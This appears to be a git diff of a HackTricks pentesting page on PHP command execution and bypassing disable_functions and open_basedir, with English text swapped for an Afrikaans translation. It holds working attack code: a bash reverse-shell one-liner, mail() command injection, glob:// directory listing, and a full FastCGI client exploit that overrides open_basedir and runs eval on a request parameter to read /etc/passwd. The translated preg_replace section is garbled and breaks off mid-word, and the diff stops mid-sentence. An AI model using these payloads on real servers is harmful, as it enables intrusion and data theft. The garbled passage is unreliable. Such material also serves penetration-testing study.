-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-## PHP Command & Code Execution +## PHP Opdrag & Kode Uitvoering -### PHP Command Execution +### PHP Opdrag Uitvoering -**Note:** A [p0wny-shell](https://github.com/flozz/p0wny-shell/blob/master/shell.php) php webshell can **automatically** check and bypass the following function if some of them be disabled. - -**exec** - Returns last line of commands output +**Nota:** 'n [p0wny-shell](https://github.com/flozz/p0wny-shell/blob/master/shell.php) php-webshell kan die volgende funksie **outomaties** toets en omseil as sommige van hulle gedeaktiveer is. +**exec** - Gee die laaste lyn van die opdrag se uitset terug ```bash echo exec("uname -a"); ``` - -**passthru** - Passes commands output directly to the browser - +**passthru** - Stuur bevels uitvoer direk na die blaaier ```bash echo passthru("uname -a"); ``` - -**system** - Passes commands output directly to the browser and returns last line - +**sisteem** - Gee bevele uitset direk aan die blaaier en gee die laaste lyn terug ```bash echo system("uname -a"); ``` - -**shell\_exec** - Returns commands output - +**shell\_exec** - Gee die uitset van opdragte terug ```bash echo shell_exec("uname -a"); ``` - -\`\` (backticks) - Same as shell\_exec() - +\`\` (backticks) - Dieselfde as shell\_exec() ```bash echo `uname -a` ``` - -**popen** - Opens read or write pipe to process of a command - +**popen** - Maak 'n lees- of skryf-pyp oop na 'n proses van 'n opdrag ```bash echo fread(popen("/bin/ls /", "r"), 4096); ``` - -**proc\_open** - Similar to popen() but greater degree of control - +**proc\_open** - Soortgelyk aan popen(), maar met 'n groter mate van beheer. ```bash proc_close(proc_open("uname -a",array(),$something)); ``` - **preg\_replace** +Die `preg\_replace`-funksie in PHP word gebruik om 'n patroon in 'n teksreeks te soek en te vervang met 'n ander waarde. Dit maak gebruik van regulêre uitdrukkings om die soek- en vervangingsproses uit te voer. 
+ +Hier is die sintaksis vir die gebruik van `preg\_replace`: + +```php +preg_replace($pattern, $replacement, $subject); +``` + +- `$pattern` is die regulêre uitdrukking wat gebruik word om die teksreeks te soek. +- `$replacement` is die waarde wat gebruik word om die ooreenstemmende patroon te vervang. +- `$subject` is die teksreeks waarin die soek- en vervangingsproses uitgevoer word. + +Hier is 'n voorbeeld van hoe `preg\_replace` gebruik kan word: + +```php +$text = "Hello, world!"; +$pattern = "/world/"; +$replacement = "universe"; + +$newText = preg_replace($pattern, $replacement, $text); +echo $newText; // Output: Hello, universe! +``` + +In hierdie voorbeeld word die woord "world" in die teksreeks "Hello, world!" vervang met die woord "universe". Die `preg\_replace`-funksie soek na die patroon "/world/" in die teksreeks en vervang dit met die waarde "universe". Die nuwe teksreeks, "Hello, universe!", word dan uitgevoer. + +Dit is belangrik om te onthou dat `preg\_replace` 'n regulêre uitdrukking gebruik om te soek na ooreenstemmende patrone. Dit beteken dat jy spesiale karakters moet ontsnap met 'n sku ```php ``` - -**pcntl\_exec** - Executes a program (by default in modern and not so modern PHP you need to load the `pcntl.so` module to use this function) - +**pcntl\_exec** - Voer 'n program uit (standaard moet jy die `pcntl.so` module laai om hierdie funksie in moderne en nie so moderne PHP te gebruik) ```bash pcntl_exec("/bin/bash", ["-c", "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"]); ``` - -**mail / mb\_send\_mail** - This function is used to send mails, but it can also be abused to inject arbitrary commands inside the `$options` parameter. This is because **php `mail` function** usually call `sendmail` binary inside the system and it allows you to **put extra options**. 
However, you won't be able to see the output of the executed command, so it's recommended to create shell script that writes the output to a file, execute it using mail, and print the output: - +**pos / mb_send_mail** - Hierdie funksie word gebruik om e-posse te stuur, maar dit kan ook misbruik word om willekeurige opdragte in die `$options` parameter in te spuit. Dit is omdat die **php `mail` funksie** gewoonlik die `sendmail` binêre lêer in die stelsel aanroep en dit jou toelaat om **ekstra opsies** in te voer. Jy sal egter nie die uitset van die uitgevoerde opdrag kan sien nie, so dit word aanbeveel om 'n skripsie te skep wat die uitset na 'n lêer skryf, dit uit te voer met behulp van mail, en die uitset te druk: ```bash file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA+IC90bXAvZmxhZy50eHQKCg==')); chmod('/www/readflag.sh', 0777); mail('', '', '', '', '-H \"exec /www/readflag.sh\"'); echo file_get_contents('/tmp/flag.txt'); ``` +**dl** - Hierdie funksie kan gebruik word om 'n PHP-uitbreiding dinamies te laai. Hierdie funksie sal nie altyd beskikbaar wees nie, so jy moet eers nagaan of dit beskikbaar is voordat jy probeer om dit uit te buit. Lees [hierdie bladsy om te leer hoe om hierdie funksie uit te buit](disable\_functions-bypass-dl-function.md). -**dl** - This function can be used to dynamically load a PHP extension. This function won't be present always, so you should check if it's available before trying to exploit it. Read[ this page to learn how to exploit this function](disable\_functions-bypass-dl-function.md). - -### PHP Code Execution - -Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities. 
+### PHP Kode Uitvoering +Afgesien van eval is daar ander maniere om PHP-kode uit te voer: include/require kan gebruik word vir afgeleë kode-uitvoering in die vorm van plaaslike lêer insluiting en afgeleë lêer insluiting kwesbaarhede. ```php ${} // If your input gets reflected in any PHP string, it will be executed. eval() @@ -105,13 +111,12 @@ $func->invokeArgs(array()); // or serialize/unserialize function ``` - ## disable\_functions & open\_basedir -**Disabled functions** is the setting that can be configured in `.ini` files in PHP that will **forbid** the use of the indicated **functions**. **Open basedir** is the setting that indicates to PHP the folder that it can access.\ -The PHP setting sue to be configured in the path _/etc/php7/conf.d_ or similar. +**Gedeaktiveerde funksies** is die instelling wat in `.ini` lêers in PHP gekonfigureer kan word om die gebruik van die aangeduide **funksies** te **verbied**. **Open basedir** is die instelling wat aan PHP aandui watter vouer toeganklik is.\ +Die PHP-instelling moet gekonfigureer word in die pad _/etc/php7/conf.d_ of soortgelyk. -Both configuration can be seen in the output of **`phpinfo()`**: +Beide konfigurasies kan gesien word in die uitset van **`phpinfo()`**: ![](https://0xrick.github.io/images/hackthebox/kryptos/17.png) 
@@ -119,436 +124,431 @@ Both configuration can be seen in the output of **`phpinfo()`**: ## open\_basedir Bypass -`open_basedir` will configure the folders that PHP can access, you **won't be able to to write/read/execute any file outside** those folders, but also you **won't even be able to list** other directories.\ -However, if somehow you are able to execute arbitrary PHP code you can **try** the following chunk of **codes** to try to **bypass** the restriction. +`open_basedir` sal die vouers konfigureer wat PHP kan toegang gee, jy **sal nie in staat wees om enige lêer buite** daardie vouers te skryf/lees/uit te voer nie, maar jy **sal selfs nie in staat wees om** ander gidslys te maak nie.\ +As jy egter op een of ander manier arbitrêre PHP-kode kan uitvoer, kan jy die volgende stuk **kodes** probeer om die beperking te **omseil**. -### Listing dirs with glob:// bypass - -In this first example the `glob://` protocol with some path bypass is used: +### Gidslyste met glob:// omseiling +In hierdie eerste voorbeeld word die `glob://`-protokol met 'n omseiling van 'n pad gebruik: ```php __toString(); +foreach($it as $f) { +$file_list[] = $f->__toString(); } $it = new DirectoryIterator("glob:///v??/run/.*"); -foreach($it as $f) { - $file_list[] = $f->__toString(); +foreach($it as $f) { +$file_list[] = $f->__toString(); } -sort($file_list); -foreach($file_list as $f){ - echo "{$f}
"; +sort($file_list); +foreach($file_list as $f){ +echo "{$f}
"; } ``` +**Nota1**: In die pad kan jy ook `/e??/*` gebruik om `/etc/*` en enige ander vouer te lys.\ +**Nota2**: Dit lyk asof 'n deel van die kode gekopieer is, maar dit is eintlik nodig!\ +**Nota3**: Hierdie voorbeeld is slegs nuttig om vouers te lys en nie om lêers te lees nie -**Note1**: In the path you can also use `/e??/*` to list `/etc/*` and any other folder.\ -**Note2**: It looks like part of the code is duplicated, but that's actually necessary!\ -**Note3**: This example is only useful to list folders not to read files +### Volledige open\_basedir omseil deur FastCGI te misbruik -### Full open\_basedir bypass abusing FastCGI - -If you want to **learn more about PHP-FPM and FastCGI** you can read the [first section of this page](disable\_functions-bypass-php-fpm-fastcgi.md).\ -If **`php-fpm`** is configured you can abuse it to completely bypass **open\_basedir**: +As jy meer wil leer oor PHP-FPM en FastCGI kan jy die [eerste gedeelte van hierdie bladsy](disable\_functions-bypass-php-fpm-fastcgi.md) lees.\ +As **`php-fpm`** gekonfigureer is, kan jy dit misbruik om heeltemal **open\_basedir** te omseil: ![](<../../../../.gitbook/assets/image (350).png>) ![](<../../../../.gitbook/assets/image (349).png>) -Note that the first thing you need to do is find where is the **unix socket of php-fpm**. It use to be under `/var/run` so you can **use the previous code to list the directory and find it**.\ -Code from [here](https://balsn.tw/ctf\_writeup/20190323-0ctf\_tctf2019quals/#wallbreaker-easy). - +Let daarop dat die eerste ding wat jy moet doen, is om uit te vind waar die **unix-socket van php-fpm** is. Dit word gewoonlik onder `/var/run` gevind, sodat jy die vorige kode kan gebruik om die gids te lys en dit te vind.\ +Kode van [hier](https://balsn.tw/ctf\_writeup/20190323-0ctf\_tctf2019quals/#wallbreaker-easy). 
```php - * @version 1.0 - */ +* Handles communication with a FastCGI application +* +* @author Pierrick Charron +* @version 1.0 +*/ class FCGIClient { - const VERSION_1 = 1; - const BEGIN_REQUEST = 1; - const ABORT_REQUEST = 2; - const END_REQUEST = 3; - const PARAMS = 4; - const STDIN = 5; - const STDOUT = 6; - const STDERR = 7; - const DATA = 8; - const GET_VALUES = 9; - const GET_VALUES_RESULT = 10; - const UNKNOWN_TYPE = 11; - const MAXTYPE = self::UNKNOWN_TYPE; - const RESPONDER = 1; - const AUTHORIZER = 2; - const FILTER = 3; - const REQUEST_COMPLETE = 0; - const CANT_MPX_CONN = 1; - const OVERLOADED = 2; - const UNKNOWN_ROLE = 3; - const MAX_CONNS = 'MAX_CONNS'; - const MAX_REQS = 'MAX_REQS'; - const MPXS_CONNS = 'MPXS_CONNS'; - const HEADER_LEN = 8; - /** - * Socket - * @var Resource - */ - private $_sock = null; - /** - * Host - * @var String - */ - private $_host = null; - /** - * Port - * @var Integer - */ - private $_port = null; - /** - * Keep Alive - * @var Boolean - */ - private $_keepAlive = false; - /** - * Constructor - * - * @param String $host Host of the FastCGI application - * @param Integer $port Port of the FastCGI application - */ - public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket - { - $this->_host = $host; - $this->_port = $port; - } - /** - * Define whether or not the FastCGI application should keep the connection - * alive at the end of a request - * - * @param Boolean $b true if the connection should stay alive, false otherwise - */ - public function setKeepAlive($b) - { - $this->_keepAlive = (boolean)$b; - if (!$this->_keepAlive && $this->_sock) { - fclose($this->_sock); - } - } - /** - * Get the keep alive status - * - * @return Boolean true if the connection should stay alive, false otherwise - */ - public function getKeepAlive() - { - return $this->_keepAlive; - } - /** - * Create a connection to the FastCGI application - */ - private function connect() - { - if 
(!$this->_sock) { - //$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5); - $this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5); - if (!$this->_sock) { - throw new Exception('Unable to connect to FastCGI application'); - } - } - } - /** - * Build a FastCGI packet - * - * @param Integer $type Type of the packet - * @param String $content Content of the packet - * @param Integer $requestId RequestId - */ - private function buildPacket($type, $content, $requestId = 1) - { - $clen = strlen($content); - return chr(self::VERSION_1) /* version */ - . chr($type) /* type */ - . chr(($requestId >> 8) & 0xFF) /* requestIdB1 */ - . chr($requestId & 0xFF) /* requestIdB0 */ - . chr(($clen >> 8 ) & 0xFF) /* contentLengthB1 */ - . chr($clen & 0xFF) /* contentLengthB0 */ - . chr(0) /* paddingLength */ - . chr(0) /* reserved */ - . $content; /* content */ - } - /** - * Build an FastCGI Name value pair - * - * @param String $name Name - * @param String $value Value - * @return String FastCGI Name value pair - */ - private function buildNvpair($name, $value) - { - $nlen = strlen($name); - $vlen = strlen($value); - if ($nlen < 128) { - /* nameLengthB0 */ - $nvpair = chr($nlen); - } else { - /* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */ - $nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF); - } - if ($vlen < 128) { - /* valueLengthB0 */ - $nvpair .= chr($vlen); - } else { - /* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */ - $nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF); - } - /* nameData & valueData */ - return $nvpair . $name . 
$value; - } - /** - * Read a set of FastCGI Name value pairs - * - * @param String $data Data containing the set of FastCGI NVPair - * @return array of NVPair - */ - private function readNvpair($data, $length = null) - { - $array = array(); - if ($length === null) { - $length = strlen($data); - } - $p = 0; - while ($p != $length) { - $nlen = ord($data{$p++}); - if ($nlen >= 128) { - $nlen = ($nlen & 0x7F << 24); - $nlen |= (ord($data{$p++}) << 16); - $nlen |= (ord($data{$p++}) << 8); - $nlen |= (ord($data{$p++})); - } - $vlen = ord($data{$p++}); - if ($vlen >= 128) { - $vlen = ($nlen & 0x7F << 24); - $vlen |= (ord($data{$p++}) << 16); - $vlen |= (ord($data{$p++}) << 8); - $vlen |= (ord($data{$p++})); - } - $array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen); - $p += ($nlen + $vlen); - } - return $array; - } - /** - * Decode a FastCGI Packet - * - * @param String $data String containing all the packet - * @return array - */ - private function decodePacketHeader($data) - { - $ret = array(); - $ret['version'] = ord($data{0}); - $ret['type'] = ord($data{1}); - $ret['requestId'] = (ord($data{2}) << 8) + ord($data{3}); - $ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5}); - $ret['paddingLength'] = ord($data{6}); - $ret['reserved'] = ord($data{7}); - return $ret; - } - /** - * Read a FastCGI Packet - * - * @return array - */ - private function readPacket() - { - if ($packet = fread($this->_sock, self::HEADER_LEN)) { - $resp = $this->decodePacketHeader($packet); - $resp['content'] = ''; - if ($resp['contentLength']) { - $len = $resp['contentLength']; - while ($len && $buf=fread($this->_sock, $len)) { - $len -= strlen($buf); - $resp['content'] .= $buf; - } - } - if ($resp['paddingLength']) { - $buf=fread($this->_sock, $resp['paddingLength']); - } - return $resp; - } else { - return false; - } - } - /** - * Get Informations on the FastCGI application - * - * @param array $requestedInfo information to retrieve - * @return array - */ - public function 
getValues(array $requestedInfo) - { - $this->connect(); - $request = ''; - foreach ($requestedInfo as $info) { - $request .= $this->buildNvpair($info, ''); - } - fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0)); - $resp = $this->readPacket(); - if ($resp['type'] == self::GET_VALUES_RESULT) { - return $this->readNvpair($resp['content'], $resp['length']); - } else { - throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT'); - } - } - /** - * Execute a request to the FastCGI application - * - * @param array $params Array of parameters - * @param String $stdin Content - * @return String - */ - public function request(array $params, $stdin) - { - $response = ''; - $this->connect(); - $request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5)); - $paramsRequest = ''; - foreach ($params as $key => $value) { - $paramsRequest .= $this->buildNvpair($key, $value); - } - if ($paramsRequest) { - $request .= $this->buildPacket(self::PARAMS, $paramsRequest); - } - $request .= $this->buildPacket(self::PARAMS, ''); - if ($stdin) { - $request .= $this->buildPacket(self::STDIN, $stdin); - } - $request .= $this->buildPacket(self::STDIN, ''); - fwrite($this->_sock, $request); - do { - $resp = $this->readPacket(); - if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) { - $response .= $resp['content']; - } - } while ($resp && $resp['type'] != self::END_REQUEST); - var_dump($resp); - if (!is_array($resp)) { - throw new Exception('Bad request'); - } - switch (ord($resp['content']{4})) { - case self::CANT_MPX_CONN: - throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]'); - break; - case self::OVERLOADED: - throw new Exception('New request rejected; too busy [OVERLOADED]'); - break; - case self::UNKNOWN_ROLE: - throw new Exception('Role value not known [UNKNOWN_ROLE]'); - break; - case self::REQUEST_COMPLETE: - return $response; - } - } +const 
VERSION_1 = 1; +const BEGIN_REQUEST = 1; +const ABORT_REQUEST = 2; +const END_REQUEST = 3; +const PARAMS = 4; +const STDIN = 5; +const STDOUT = 6; +const STDERR = 7; +const DATA = 8; +const GET_VALUES = 9; +const GET_VALUES_RESULT = 10; +const UNKNOWN_TYPE = 11; +const MAXTYPE = self::UNKNOWN_TYPE; +const RESPONDER = 1; +const AUTHORIZER = 2; +const FILTER = 3; +const REQUEST_COMPLETE = 0; +const CANT_MPX_CONN = 1; +const OVERLOADED = 2; +const UNKNOWN_ROLE = 3; +const MAX_CONNS = 'MAX_CONNS'; +const MAX_REQS = 'MAX_REQS'; +const MPXS_CONNS = 'MPXS_CONNS'; +const HEADER_LEN = 8; +/** +* Socket +* @var Resource +*/ +private $_sock = null; +/** +* Host +* @var String +*/ +private $_host = null; +/** +* Port +* @var Integer +*/ +private $_port = null; +/** +* Keep Alive +* @var Boolean +*/ +private $_keepAlive = false; +/** +* Constructor +* +* @param String $host Host of the FastCGI application +* @param Integer $port Port of the FastCGI application +*/ +public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket +{ +$this->_host = $host; +$this->_port = $port; +} +/** +* Define whether or not the FastCGI application should keep the connection +* alive at the end of a request +* +* @param Boolean $b true if the connection should stay alive, false otherwise +*/ +public function setKeepAlive($b) +{ +$this->_keepAlive = (boolean)$b; +if (!$this->_keepAlive && $this->_sock) { +fclose($this->_sock); +} +} +/** +* Get the keep alive status +* +* @return Boolean true if the connection should stay alive, false otherwise +*/ +public function getKeepAlive() +{ +return $this->_keepAlive; +} +/** +* Create a connection to the FastCGI application +*/ +private function connect() +{ +if (!$this->_sock) { +//$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5); +$this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5); +if (!$this->_sock) { +throw new Exception('Unable to connect to FastCGI 
application'); +} +} +} +/** +* Build a FastCGI packet +* +* @param Integer $type Type of the packet +* @param String $content Content of the packet +* @param Integer $requestId RequestId +*/ +private function buildPacket($type, $content, $requestId = 1) +{ +$clen = strlen($content); +return chr(self::VERSION_1) /* version */ +. chr($type) /* type */ +. chr(($requestId >> 8) & 0xFF) /* requestIdB1 */ +. chr($requestId & 0xFF) /* requestIdB0 */ +. chr(($clen >> 8 ) & 0xFF) /* contentLengthB1 */ +. chr($clen & 0xFF) /* contentLengthB0 */ +. chr(0) /* paddingLength */ +. chr(0) /* reserved */ +. $content; /* content */ +} +/** +* Build an FastCGI Name value pair +* +* @param String $name Name +* @param String $value Value +* @return String FastCGI Name value pair +*/ +private function buildNvpair($name, $value) +{ +$nlen = strlen($name); +$vlen = strlen($value); +if ($nlen < 128) { +/* nameLengthB0 */ +$nvpair = chr($nlen); +} else { +/* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */ +$nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF); +} +if ($vlen < 128) { +/* valueLengthB0 */ +$nvpair .= chr($vlen); +} else { +/* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */ +$nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF); +} +/* nameData & valueData */ +return $nvpair . $name . 
$value; +} +/** +* Read a set of FastCGI Name value pairs +* +* @param String $data Data containing the set of FastCGI NVPair +* @return array of NVPair +*/ +private function readNvpair($data, $length = null) +{ +$array = array(); +if ($length === null) { +$length = strlen($data); +} +$p = 0; +while ($p != $length) { +$nlen = ord($data{$p++}); +if ($nlen >= 128) { +$nlen = ($nlen & 0x7F << 24); +$nlen |= (ord($data{$p++}) << 16); +$nlen |= (ord($data{$p++}) << 8); +$nlen |= (ord($data{$p++})); +} +$vlen = ord($data{$p++}); +if ($vlen >= 128) { +$vlen = ($nlen & 0x7F << 24); +$vlen |= (ord($data{$p++}) << 16); +$vlen |= (ord($data{$p++}) << 8); +$vlen |= (ord($data{$p++})); +} +$array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen); +$p += ($nlen + $vlen); +} +return $array; +} +/** +* Decode a FastCGI Packet +* +* @param String $data String containing all the packet +* @return array +*/ +private function decodePacketHeader($data) +{ +$ret = array(); +$ret['version'] = ord($data{0}); +$ret['type'] = ord($data{1}); +$ret['requestId'] = (ord($data{2}) << 8) + ord($data{3}); +$ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5}); +$ret['paddingLength'] = ord($data{6}); +$ret['reserved'] = ord($data{7}); +return $ret; +} +/** +* Read a FastCGI Packet +* +* @return array +*/ +private function readPacket() +{ +if ($packet = fread($this->_sock, self::HEADER_LEN)) { +$resp = $this->decodePacketHeader($packet); +$resp['content'] = ''; +if ($resp['contentLength']) { +$len = $resp['contentLength']; +while ($len && $buf=fread($this->_sock, $len)) { +$len -= strlen($buf); +$resp['content'] .= $buf; +} +} +if ($resp['paddingLength']) { +$buf=fread($this->_sock, $resp['paddingLength']); +} +return $resp; +} else { +return false; +} +} +/** +* Get Informations on the FastCGI application +* +* @param array $requestedInfo information to retrieve +* @return array +*/ +public function getValues(array $requestedInfo) +{ +$this->connect(); +$request = ''; +foreach 
($requestedInfo as $info) { +$request .= $this->buildNvpair($info, ''); +} +fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0)); +$resp = $this->readPacket(); +if ($resp['type'] == self::GET_VALUES_RESULT) { +return $this->readNvpair($resp['content'], $resp['length']); +} else { +throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT'); +} +} +/** +* Execute a request to the FastCGI application +* +* @param array $params Array of parameters +* @param String $stdin Content +* @return String +*/ +public function request(array $params, $stdin) +{ +$response = ''; +$this->connect(); +$request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5)); +$paramsRequest = ''; +foreach ($params as $key => $value) { +$paramsRequest .= $this->buildNvpair($key, $value); +} +if ($paramsRequest) { +$request .= $this->buildPacket(self::PARAMS, $paramsRequest); +} +$request .= $this->buildPacket(self::PARAMS, ''); +if ($stdin) { +$request .= $this->buildPacket(self::STDIN, $stdin); +} +$request .= $this->buildPacket(self::STDIN, ''); +fwrite($this->_sock, $request); +do { +$resp = $this->readPacket(); +if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) { +$response .= $resp['content']; +} +} while ($resp && $resp['type'] != self::END_REQUEST); +var_dump($resp); +if (!is_array($resp)) { +throw new Exception('Bad request'); +} +switch (ord($resp['content']{4})) { +case self::CANT_MPX_CONN: +throw new Exception('Hierdie app kan nie multiplex nie [CANT_MPX_CONN]'); +break; +case self::OVERLOADED: +throw new Exception('Nuwe versoek afgekeur; te besig [OVERLOADED]'); +break; +case self::UNKNOWN_ROLE: +throw new Exception('Rolwaarde onbekend [UNKNOWN_ROLE]'); +break; +case self::REQUEST_COMPLETE: +return $response; +} +} } ?> "; // php payload -- Doesnt do anything +$code = ""; // php payload -- Doen niks nie $php_value = "allow_url_include = On\nopen_basedir = 
/\nauto_prepend_file = php://input"; //$php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php"; $params = array( - 'GATEWAY_INTERFACE' => 'FastCGI/1.0', - 'REQUEST_METHOD' => 'POST', - 'SCRIPT_FILENAME' => $filepath, - 'SCRIPT_NAME' => $req, - 'QUERY_STRING' => 'command='.$_REQUEST['cmd'], - 'REQUEST_URI' => $uri, - 'DOCUMENT_URI' => $req, +'GATEWAY_INTERFACE' => 'FastCGI/1.0', +'REQUEST_METHOD' => 'POST', +'SCRIPT_FILENAME' => $filepath, +'SCRIPT_NAME' => $req, +'QUERY_STRING' => 'command='.$_REQUEST['cmd'], +'REQUEST_URI' => $uri, +'DOCUMENT_URI' => $req, #'DOCUMENT_ROOT' => '/', - 'PHP_VALUE' => $php_value, - 'SERVER_SOFTWARE' => '80sec/wofeiwo', - 'REMOTE_ADDR' => '127.0.0.1', - 'REMOTE_PORT' => '9985', - 'SERVER_ADDR' => '127.0.0.1', - 'SERVER_PORT' => '80', - 'SERVER_NAME' => 'localhost', - 'SERVER_PROTOCOL' => 'HTTP/1.1', - 'CONTENT_LENGTH' => strlen($code) - ); +'PHP_VALUE' => $php_value, +'SERVER_SOFTWARE' => '80sec/wofeiwo', +'REMOTE_ADDR' => '127.0.0.1', +'REMOTE_PORT' => '9985', +'SERVER_ADDR' => '127.0.0.1', +'SERVER_PORT' => '80', +'SERVER_NAME' => 'localhost', +'SERVER_PROTOCOL' => 'HTTP/1.1', +'CONTENT_LENGTH' => strlen($code) +); // print_r($_REQUEST); // print_r($params); //echo "Call: $uri\n\n"; echo $client->request($params, $code)."\n"; ?> ``` - -This scripts will communicate with **unix socket of php-fpm** (usually located in /var/run if fpm is used) to execute arbitrary code. The `open_basedir` settings will be overwritten by the **PHP\_VALUE** attribute that is sent.\ -Note how `eval` is used to execute the PHP code you send inside the **cmd** parameter.\ -Also note the **commented line 324**, you can uncomment it and the **payload will automatically connect to the given URL and execute the PHP code** contained there.\ -Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` to get the content of the `/etc/passwd` file. 
+Hierdie skrip sal kommunikeer met die **unix-socket van php-fpm** (gewoonlik geleë in /var/run as fpm gebruik word) om willekeurige kode uit te voer. Die `open_basedir` instellings sal oorskryf word deur die **PHP\_VALUE** eienskap wat gestuur word.\ +Let op hoe `eval` gebruik word om die PHP-kode wat jy stuur binne die **cmd** parameter uit te voer.\ +Let ook op die **uitgekommentarieerde lyn 324**, jy kan dit onuitgekommentarieer en die **payload sal outomaties verbind met die gegewe URL en die PHP-kode** wat daar bevat word, uitvoer.\ +Besoek net `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` om die inhoud van die `/etc/passwd` lêer te kry. {% hint style="warning" %} -You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can **overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php** configuration file and the changes you perform using PHP\_VALUE won't be effective on this specific setting. +Jy mag dalk dink dat net soos ons die `open_basedir` konfigurasie oorskryf het, kan ons ook **`disable_functions` oorskryf**. Wel, probeer dit, maar dit sal nie werk nie, blykbaar kan **`disable_functions` slegs gekonfigureer word in 'n `.ini` php** konfigurasie lêer en die veranderinge wat jy maak met PHP\_VALUE sal nie effektief wees vir hierdie spesifieke instelling nie. {% endhint %} -## disable\_functions Bypass +## disable\_functions Oorloop -If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**. 
In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\ -So, lets see how you can bypass this restriction (if you can) +As jy PHP-kode kan uitvoer binne 'n masjien, wil jy waarskynlik na die volgende vlak gaan en **willekeurige stelselopdragte uitvoer**. In hierdie situasie is dit gewoonlik om te ontdek dat die meeste of al die PHP **funksies** wat toelaat om **stelselopdragte uit te voer, gedeaktiveer is** in **`disable_functions`.**\ +Kom ons kyk hoe jy hierdie beperking kan oorloop (as jy kan) -### Automatic bypass discovery +### Outomatiese oorloop-ontdekking -You can use the tool [https://github.com/teambi0s/dfunc-bypasser](https://github.com/teambi0s/dfunc-bypasser) and it will indicate you which function (if any) you can use to **bypass** **`disable_functions`**. +Jy kan die instrument [https://github.com/teambi0s/dfunc-bypasser](https://github.com/teambi0s/dfunc-bypasser) gebruik en dit sal aandui watter funksie (as enige) jy kan gebruik om **`disable_functions` te oorloop**. -### Bypassing using other system functions +### Oorloop deur ander stelsel funksies te gebruik -Just return to the beginning of this page and **check if any of the command executing functions isn't disabled and available in the environment**. If you find just 1 of them, you will be able to use it to execute arbitrary system commands. +Gaan net terug na die begin van hierdie bladsy en **kyk of enige van die opdrag uitvoerende funksies nie gedeaktiveer is en beskikbaar is in die omgewing nie**. As jy een van hulle vind, sal jy dit kan gebruik om willekeurige stelselopdragte uit te voer. -### LD\_PRELOAD bypass +### LD\_PRELOAD oorloop -It's well known that some functions in PHP like `mail()`are going to 